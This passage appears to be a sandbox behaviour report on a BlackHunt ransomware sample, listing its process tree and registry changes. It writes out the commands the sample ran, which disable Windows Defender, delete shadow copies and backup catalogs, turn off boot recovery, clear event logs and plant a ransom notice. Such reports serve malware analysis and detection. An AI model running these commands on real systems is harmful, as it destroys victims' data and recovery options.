117 PID 4600 wrote to memory of 1740 4600 cmd.exe 117 PID 1856 wrote to memory of 3884 1856 f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe 119 PID 1856 wrote to memory of 3884 1856 f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe 119 PID 1856 wrote to memory of 2056 1856 f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe 122 PID 1856 wrote to memory of 2056 1856 f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe 122 PID 1856 wrote to memory of 2088 1856 f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe 121 PID 1856 wrote to memory of 2088 1856 f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe 121 PID 1856 wrote to memory of 1576 1856 f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe 127 PID 1856 wrote to memory of 1576 1856 f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe 127 PID 1856 wrote to memory of 3576 1856 f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe 125 PID 1856 wrote to memory of 3576 1856 f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe 125 PID 1244 wrote to memory of 1476 1244 cmd.exe 124 PID 1244 wrote to memory of 1476 1244 cmd.exe 124 PID 444 wrote to memory of 780 444 cmd.exe 139 PID 444 wrote to memory of 780 444 cmd.exe 139 PID 1856 wrote to memory of 1356 1856 f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe 129 PID 1856 wrote to memory of 1356 1856 f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe 129 PID 1856 wrote to memory of 1876 1856 f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe 137 PID 1856 wrote to memory of 1876 1856 f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe 137 PID 1856 wrote to memory of 1964 1856 f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe 132 PID 1856 wrote to memory of 1964 1856 f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe 132 PID 4576 wrote to memory of 4032 4576 cmd.exe 136 PID 4576 wrote to memory of 4032 4576 cmd.exe 136 PID 1856 wrote to memory of 1644 1856 f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe 135 PID 1856 wrote to memory of 1644 1856 f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe 135 PID 3948 wrote to memory of 1432 3948 cmd.exe 134 PID 3948 wrote to memory of 1432 3948 cmd.exe 134 PID 1856 wrote to memory of 4284 1856 f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe 142 PID 1856 wrote to memory of 4284 1856 f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe 142 PID 5016 wrote to memory of 2448 5016 cmd.exe 140 PID 5016 wrote to memory of 2448 5016 cmd.exe 140 PID 1856 wrote to memory of 4512 1856 f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe 144 PID 1856 wrote to memory of 4512 1856 f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe 144 PID 1856 wrote to memory of 4752 1856 f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe 146 PID 1856 wrote to memory of 4752 1856 f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe 146 PID 1856 wrote to memory of 4196 1856 f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe 147 PID 1856 wrote to memory of 4196 1856 f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe 147 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe"C:\Users\Admin\AppData\Local\Temp\f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1856 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1244 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:1476
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4576 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:4032
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4600 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:1740
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3948 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:1432
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:444 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:1128
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:4644
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:660
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:4980
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:1360
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:2512
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:180
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:5252
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:4716
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:5220
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2748
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:5228
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:5016 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:2448
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:1976
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:3152
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:3884
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:11784
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2088
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:7016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2056
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:11732
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:3576
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:11648
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:1576
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:5500
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:1356
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:11984
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:1964
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:11428
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1644
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:11096
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1876
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:11980
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:4284
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:10272
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:4512
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:10220
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:4752
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:10280
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:4196
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:11432
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2412
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:7748
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:388
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:10296
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:3328
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:5976
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe" /F2⤵PID:2764
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe" /F3⤵
- Creates scheduled task(s)
PID:6048
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:5132
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:6132
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:5304
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:5220
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:5372
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:6644
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:5464
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:6772
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:5348
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:11544
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:5340
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:10460
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:5260
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:7576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:5164
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:8400
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:5144
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:7940
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2216
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:5228
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:5060
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:8588
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:8960
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:548
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:11024
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:6696
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:3188
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1148
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:11216
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:6140
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:2000
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:848
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:2616
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:6432
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:4500
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1512
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1684
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2224
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:7040
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:9184
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:3112
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:15624
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:4820
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:15808
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:15588
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:17684
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:7392
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:17896
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:17468
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:18000
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:17448
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:17984
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:15708
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:17800
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:15780
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:17808
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:15684
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:17732
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵
- Checks computer location settings
- Modifies registry class
PID:2964 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:18136
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 18136 -s 14524⤵
- Program crash
PID:18304
-
-
-
-
